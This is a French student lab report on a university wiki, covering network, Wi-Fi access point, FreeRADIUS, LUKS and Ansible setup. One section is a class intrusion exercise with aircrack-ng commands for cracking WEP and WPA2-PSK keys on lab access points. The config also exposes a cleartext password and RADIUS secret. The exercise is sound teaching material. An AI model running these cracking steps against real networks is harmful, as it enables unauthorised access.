   i:C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
 Server certificate&lt;br /&gt;
 -----BEGIN CERTIFICATE-----&lt;br /&gt;
 [...]&lt;br /&gt;
 -----END CERTIFICATE-----&lt;br /&gt;
 subject=CN = paixdieu.site&lt;br /&gt;
 issuer=C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
= Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
'''5.5  Intrusion sur un serveur d’application Web'''&lt;br /&gt;
[[Fichier:Wiki intrusion 5.5.zip]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom du point d'accès connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Sources : &lt;br /&gt;
- https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
- https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau006.html#sec29&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en root (mdp : Cisco si par défaut)&lt;br /&gt;
 conf t &lt;br /&gt;
 hostname wifi-ima5sc-e304 =&amp;gt; (optionnel) on donne un nom à notre point d'accès&lt;br /&gt;
 ip domain-name plil.info =&amp;gt; ajoute un nom de domaine (utilisé pour la création de certificats)&lt;br /&gt;
 &lt;br /&gt;
Activation du ssh :&lt;br /&gt;
 &lt;br /&gt;
 crypto key generate rsa general-keys modulus 2048 =&amp;gt; Génération clés publique/privée &lt;br /&gt;
 ip ssh version 2 =&amp;gt; Activation ssh&lt;br /&gt;
&lt;br /&gt;
Configuration de l'authentification sur le point d'accès :&lt;br /&gt;
&lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_marguerite group radius_marguerite&lt;br /&gt;
 radius-server host 193.48.57.177 auth-port 1812 acct-port 1813 key secret_marguerite&lt;br /&gt;
 aaa group server radius radius_marguerite&lt;br /&gt;
 server 193.48.57.177 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 dot11 ssid SSID_MARGUERITE&lt;br /&gt;
 vlan 11&lt;br /&gt;
  authentication open eap eap_marguerite&lt;br /&gt;
  authentication network-eap eap_marguerite&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
  mbssid guest-mode&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Association du SSID à l'interface Wi-Fi :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
  encryption vlan 11 mode ciphers aes-ccm tkip&lt;br /&gt;
  ssid SSID_MARGUERITE&lt;br /&gt;
  mbssid&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration du Vlan 11 :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  no ip route-cache&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  bridge-group 11 subscriber-loop-control&lt;br /&gt;
  bridge-group 11 spanning-disabled&lt;br /&gt;
  bridge-group 11 block-unknown-source&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration interface filaire :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'IP du point d'accès et sa Gateway (n'est pas à faire par tous les groupes) :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
  ip default-gateway 10.1.0.2&lt;br /&gt;
  interface BVI 1&lt;br /&gt;
   ip address 10.1.0.4 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
'''Configuration du routeur en e304 :''' &lt;br /&gt;
&lt;br /&gt;
Configuration du VLAN1 :&lt;br /&gt;
  conf t&lt;br /&gt;
  interface vlan 1&lt;br /&gt;
   ip address 10.1.0.2 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Configuration du port sur lequel est branché l'AP en mode trunk : &lt;br /&gt;
&lt;br /&gt;
  conf t&lt;br /&gt;
  interface Gi4/2&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
   switchport trunk allowed vlan add 1&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
= Serveur FreeRadius =&lt;br /&gt;
&lt;br /&gt;
Installation de freeRADIUS&lt;br /&gt;
&lt;br /&gt;
 apt install freeradius&lt;br /&gt;
&lt;br /&gt;
On commence par configurer &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; à détailler&lt;br /&gt;
&lt;br /&gt;
 client marguerite {&lt;br /&gt;
 	ipaddr = 10.1.0.4/24&lt;br /&gt;
 	secret = secret_marguerite&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
ensuite &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 eap {&lt;br /&gt;
   [...]&lt;br /&gt;
   default_eap_type = peap&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
puis &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 root Cleartext-Password := &amp;quot;glopglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug &amp;lt;code&amp;gt;freeradius -X&amp;lt;/code&amp;gt; (après avoir au préalable stoppé le processus)&lt;br /&gt;
&lt;br /&gt;
= Réalisations =&lt;br /&gt;
'''6.2 Chiffrement de données '''&lt;br /&gt;
&lt;br /&gt;
On se met en root sur une zabeth et on affiche les périphériques avec lsblk.&lt;br /&gt;
&lt;br /&gt;
On s'interesse au périphérique suivant :&lt;br /&gt;
 sdb      8:16   1   7.6G  0 disk &lt;br /&gt;
 └─sdb1   8:17   1   7.6G  0 part /media/pifou/USB DISK&lt;br /&gt;
&lt;br /&gt;
On formate la clef en ext4&lt;br /&gt;
 mkfs.ext4 /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
Puis on commence le cryptage en initialisant la clef avec un mot de passe (ici le mot de passe habituel mais x3):&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
On crée une partition chiffrée appelée data avec sa passphrase :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 data&lt;br /&gt;
&lt;br /&gt;
Que l'on formate :&lt;br /&gt;
 mkfs.ext4 /dev/mapper/data&lt;br /&gt;
&lt;br /&gt;
On monte cette partition pour lui permettre de contenir des fichiers : &lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/data_usb&lt;br /&gt;
 mount -t ext4 /dev/mapper/data /mnt/data_usb&lt;br /&gt;
&lt;br /&gt;
On écrit un fichier test dans la partition :&lt;br /&gt;
  vim /mnt/data_usb/test&lt;br /&gt;
&lt;br /&gt;
On démonte la partition :&lt;br /&gt;
 umount /mnt/data_usb&lt;br /&gt;
Et on ferme le volume maintenant chiffré :&lt;br /&gt;
 cryptsetup luksClose data&lt;br /&gt;
&lt;br /&gt;
En voulant accéder à la clef, nous avons maintenant une demande de mot de passe, une fois insérer le fichier test est bien dedans avec son contenu.&lt;br /&gt;
&lt;br /&gt;
= Ferme de serveurs Web =&lt;br /&gt;
&lt;br /&gt;
Installation VM xen :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/pra-07.cfg&lt;br /&gt;
&lt;br /&gt;
Configuration IP :&lt;br /&gt;
&lt;br /&gt;
Dans /etc/network/interfaces :&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.102&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Vérifier si on a bien la passerelle par défaut de configurer &lt;br /&gt;
&lt;br /&gt;
 ip r&lt;br /&gt;
&lt;br /&gt;
On peut pinger le routeur :&lt;br /&gt;
&lt;br /&gt;
 ping 172.26.154.254&lt;br /&gt;
&lt;br /&gt;
Mais pas les addresses ipv4 routée :&lt;br /&gt;
&lt;br /&gt;
 ping 8.8.8.8 échoue &lt;br /&gt;
&lt;br /&gt;
Redémarage service networking&lt;br /&gt;
&lt;br /&gt;
 service networking restart&lt;br /&gt;
&lt;br /&gt;
Si ça n'est pas suffisant :&lt;br /&gt;
&lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
 &lt;br /&gt;
Dans /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Redémarage service ssh&lt;br /&gt;
export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'une clé ssh sur la zabeth et ajout de cette clé dans les clés autorisées de la vm de pra :&lt;br /&gt;
&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;aviran.tetia@polytech-lille.net&amp;quot; -P &amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
On copie le contenu de la clé crée :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_ed25519.pub&lt;br /&gt;
&lt;br /&gt;
On colle son contenu dans les clé authorisées de la VM (fichier ~/.ssh/authorized_keys) :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/authorized_keys &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Correction de la source list de la VM pour pouvoir utiliser apt correctement :&lt;br /&gt;
&lt;br /&gt;
On remplace les deux dernières lignes par :&lt;br /&gt;
&lt;br /&gt;
 deb     http://security.debian.org/debian-security bullseye-security main contrib non-free&lt;br /&gt;
 deb-src http://security.debian.org/debian-security bullseye-security  main contrib non-free&lt;br /&gt;
 &lt;br /&gt;
Installation de python sur la VM :&lt;br /&gt;
&lt;br /&gt;
 apt update &lt;br /&gt;
 apt install python3&lt;br /&gt;
&lt;br /&gt;
Création d'un venv pour l'éxecution :&lt;br /&gt;
&lt;br /&gt;
 python3 -m venv ~/env-ansible&lt;br /&gt;
 . ~/env-ansible/bin/activate&lt;br /&gt;
 pip3 install -U setuptools wheel&lt;br /&gt;
 pip3 install -U ansible&lt;br /&gt;
&lt;br /&gt;
On crée l'arborescence suivante :&lt;br /&gt;
 &lt;br /&gt;
 └── roles&lt;br /&gt;
    ├── base&lt;br /&gt;
    │   ├── tasks&lt;br /&gt;
    │   │   └── main.yml&lt;br /&gt;
    │   └── templates&lt;br /&gt;
    │       ├── hostname.j2&lt;br /&gt;
    │       └── hosts.j2&lt;br /&gt;
    └── ssh_key&lt;br /&gt;
        ├── tasks&lt;br /&gt;
        │   └── main.yml&lt;br /&gt;
        └── templates&lt;br /&gt;
            └── keys.j2&lt;br /&gt;
&lt;br /&gt;
Dans main.yml :&lt;br /&gt;
 - name: &amp;quot;Setup sshkeys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: &amp;quot;0600&amp;quot;&lt;br /&gt;
&lt;br /&gt;
/!\ ne pas mettre de tabulation dans ce fichier, uniquement des espaces&lt;br /&gt;
&lt;br /&gt;
Dans keys.j2 :&lt;br /&gt;
  {% for item in ssh_keys %}&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;{{ item.key }}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
Ajout d'une clef dans les variables de groupe group_vars/all.yaml :&lt;br /&gt;
 &lt;br /&gt;
 ssh_keys:&lt;br /&gt;
  # if you don't install this i won't be able to get into your nodes to help you debug :)&lt;br /&gt;
  - name: tmaurice@thonkpad&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad&lt;br /&gt;
    # add more keys here&lt;br /&gt;
  - name: aviran.tetia@polytech-lille.net&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis lancer la commande :&lt;br /&gt;
&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
Vérification dans le fichier /root/.ssh/authorized_keys  :&lt;br /&gt;
 &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Nous obtenons bien toutes nos clefs ssh.&lt;br /&gt;
&lt;br /&gt;
Ajout des var d'environement pour pouvoir installer docker :&lt;br /&gt;
&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Installation du rôle Docker :&lt;br /&gt;
 &lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Puis dans polytech.yml :&lt;br /&gt;
&lt;br /&gt;
 - hosts: all&lt;br /&gt;
   roles:&lt;br /&gt;
    ...&lt;br /&gt;
    - geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après ré-execution du playbook, nous pouvons vérifier que Docker est bien installé : &lt;br /&gt;
&lt;br /&gt;
 docker -v &lt;br /&gt;
&lt;br /&gt;
Installation du Pare-feu :&lt;br /&gt;
&lt;br /&gt;
source : https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
&lt;br /&gt;
- création de roles/iptables/tasks/main.yml :&lt;br /&gt;
&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT tcp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: tcp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_tcp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT udp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: udp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_udp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Set the policy for the INPUT chain to DROP&lt;br /&gt;
  ansible.builtin.iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    policy: DROP&lt;br /&gt;
&lt;br /&gt;
- Cration du fichier de variables :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_tcp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8500&lt;br /&gt;
  - 8501&lt;br /&gt;
  - 8502&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 8300 &lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_udp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58079</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58079"/>
				<updated>2022-01-12T16:39:24Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
